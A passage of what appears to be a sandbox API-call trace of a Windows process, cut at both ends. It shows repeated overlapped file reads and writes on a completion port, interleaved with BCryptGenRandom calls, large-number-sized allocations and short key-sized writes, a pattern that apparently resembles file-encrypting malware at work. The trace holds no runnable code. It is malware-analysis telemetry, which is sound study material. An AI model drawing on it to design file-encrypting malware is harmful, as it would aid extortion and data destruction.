CloseHandle (hObject=0x3bc) returned 1 [0118.920] free (_Block=0x3df0008) [0118.920] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.932] CloseHandle (hObject=0x308) returned 1 [0118.940] free (_Block=0x1ff1e60) [0118.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.962] CloseHandle (hObject=0x2f4) returned 1 [0118.964] free (_Block=0x3e70008) [0118.964] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.969] WriteFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0118.970] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.980] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.981] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0118.981] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.981] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0118.981] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.981] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.981] free (_Block=0x3e305b8) [0118.981] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.981] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.982] free (_Block=0x77d8b8) [0118.982] free (_Block=0x2071c20) [0118.982] free (_Block=0x77d7a8) [0118.982] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0118.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0118.994] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x23e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0118.994] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0119.005] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1b08, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0119.006] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.554] WriteFile (in: hFile=0x13c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.566] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.566] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.572] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x4c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0120.572] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.580] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0120.580] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.580] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0120.580] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.580] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.580] free (_Block=0x3e305b8) [0120.580] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.580] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.581] free (_Block=0x77d8b8) [0120.581] free (_Block=0x2071c20) [0120.581] free (_Block=0x77d7a8) [0120.581] WriteFile (in: hFile=0x13c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.598] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x257c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0120.606] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.632] WriteFile (in: hFile=0x13c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8a20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.632] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.640] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x82a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0120.641] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.648] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.649] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0120.649] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.649] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0120.649] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.649] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.649] free (_Block=0x3e305b8) [0120.649] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.649] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.650] free (_Block=0x77d8b8) [0120.650] free (_Block=0x2071c20) [0120.650] free (_Block=0x77d7a8) [0120.650] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.650] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.655] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.656] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0120.656] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.656] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0120.656] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.656] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.656] free (_Block=0x3e305b8) [0120.656] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.656] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.657] free (_Block=0x77d8b8) [0120.657] free (_Block=0x2071c20) [0120.657] free (_Block=0x77d7a8) [0120.657] WriteFile (in: hFile=0x13c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.657] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.660] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.661] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.670] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.670] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0120.670] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.670] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0120.671] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.671] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.671] free (_Block=0x3e305b8) [0120.671] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.671] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.671] free (_Block=0x77d8b8) [0120.671] free (_Block=0x2071c20) [0120.671] free (_Block=0x77d7a8) [0120.671] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0120.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.673] CloseHandle (hObject=0x13c0) returned 1 [0120.673] free (_Block=0x3df0008) [0120.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.673] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x3d40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0120.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.711] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x5314, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0120.713] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.713] CloseHandle (hObject=0x308) returned 1 [0120.713] free (_Block=0x3e70008) [0120.713] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.733] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0120.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0120.735] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.735] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.735] free (_Block=0x3e305b8) [0120.735] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.735] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.735] free (_Block=0x77d8b8) [0120.735] free (_Block=0x2071c20) [0120.735] free (_Block=0x77d7a8) [0120.735] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.747] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.747] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0120.747] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.748] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0120.748] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.748] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.748] free (_Block=0x3e305b8) [0120.748] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.748] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.748] free (_Block=0x77d8b8) [0120.748] free (_Block=0x2071c20) [0120.748] free (_Block=0x77d7a8) [0120.748] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.755] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.756] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0120.756] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.756] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0120.757] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.757] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.757] free (_Block=0x3e305b8) [0120.757] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.757] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.757] free (_Block=0x77d8b8) [0120.757] free (_Block=0x2071c20) [0120.757] free (_Block=0x77d7a8) [0120.757] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0120.758] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.783] CloseHandle (hObject=0x3bc) returned 1 [0120.784] free (_Block=0x1ff1e60) [0120.784] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.796] CloseHandle (hObject=0x340) returned 1 [0120.797] free (_Block=0x3d70450) [0120.797] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.810] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x44f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0120.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.820] CloseHandle (hObject=0x308) returned 1 [0120.820] free (_Block=0x3df0008) [0120.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.826] CloseHandle (hObject=0x2f4) returned 1 [0120.826] free (_Block=0x3ef0008) [0120.827] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.836] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0120.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.848] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa442, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0120.853] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.859] CloseHandle (hObject=0x308) returned 1 [0120.861] free (_Block=0x3df0008) [0120.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.862] CloseHandle (hObject=0x3bc) returned 1 [0120.870] free (_Block=0x1ff1e60) [0120.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.939] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.940] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0120.942] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.942] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0120.943] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.943] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.943] free (_Block=0x3e305b8) [0120.944] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0120.944] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.945] free (_Block=0x1fa90b8) [0120.945] free (_Block=0x2071c20) [0120.945] free (_Block=0x77d7a8) [0120.946] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, 